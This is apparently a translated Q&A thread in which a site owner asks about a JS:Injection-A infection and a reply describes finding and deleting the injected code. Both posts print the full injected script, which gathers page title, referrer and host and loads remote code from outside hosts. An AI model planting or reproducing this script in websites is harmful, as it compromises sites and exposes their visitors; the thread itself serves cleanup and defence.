0

今天,当我想进入我的网站:forumhan.com 时,我收到了 Avast 的警告。

要理解这一点,您的计算机上必须安装 Avast。

我的网站感染了 JS:Injection-A[Trj]——这就是它没有显示的原因。

当我看的时候,我在标题上发现了这个:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vkza.tora.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

由于我不是专业人士,我无法理解是否与其他文件有任何关系。

此代码中是否有对其他文件的调用?

删除它是否解决了问题?

我删除了它,但我看不到我的网页。

4

1 回答 1

2

我找到了解决方案。

问题是你在说什么。有人将该代码注入您的网站(以及我的网站)。所以我所做的是选择这个片段:

encodeURIComponent(document.title)

并在服务器上使用 Notepad++ 搜索所有文件中的htdocs文件夹。

然后我发现了这样的东西:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://delicefilm.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

在这里:

在此处输入图像描述

我已经从所有文件中删除了它。就这样!

希望它也适合你!:)

于 2016-01-13T22:46:15.880 回答